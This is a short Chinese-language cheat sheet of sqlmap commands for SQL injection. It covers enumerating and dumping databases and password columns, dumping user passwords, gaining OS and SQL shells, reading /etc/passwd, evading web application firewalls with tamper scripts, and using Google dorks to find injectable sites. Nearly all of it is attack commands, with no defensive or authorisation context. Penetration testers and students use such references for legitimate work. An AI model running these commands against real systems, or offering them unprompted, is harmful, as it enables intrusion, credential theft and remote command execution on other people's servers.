sqlmap使用方法
1.GET:
sqlmap -u “” --dbs
sqlmap -u “” -D “” --tables
sqlmap -u “” -D “” -T “” --columns
sqlmap -u “” -D “” -T “” -C “id,passwd” --dump
2.POST:
sqlmap -r 3.txt --dbs --level=3
当前数据库:–current-dbs
3.txt 里面参数的部分要打*
3.高级用法:
sqlmap -r 3.txt --users --level=3
sqlmap -r 3.txt --os-shell --level=3
选择语言php、路径1、获取shell
输入命令id、whoami、ipconfig、echo “123” >> 1.txt
echo “<?php phpinfo(); ?>” >> 2.txt
4.自主选择、智能选择
sqlmap -r 3.txt --os-shell --batch --smart --level=3
不会显示y
5.绕waf --tamper
sqlmap -r 3.txt --tamper=space2mysqlblank.py --passwords
获取账号和密码
sqlmap -r 3.txt --tamper= --passwords --delay=20 delay会发包变慢
找脚本的位置:
whereis sqlmap
cd tanper
脚本不添加py也行
6.自动注入
sqlmap -r 3.txt --batch --smart --level=3 -a
sqlmap -r 3.txt --os-cmd=“id” --level=3
sqlmap -r 3.txt --os-shell --batch --level=3
7.数据库的shell
sqlmap -r 3.txt --sql-shell --level=3
select loadfile("/etc/passwd")
sqlmap -r 3.txt --os-pwn --level=3
8.谷歌语法:
sqlmap -r 3.txt -g “inurl:php?id=1”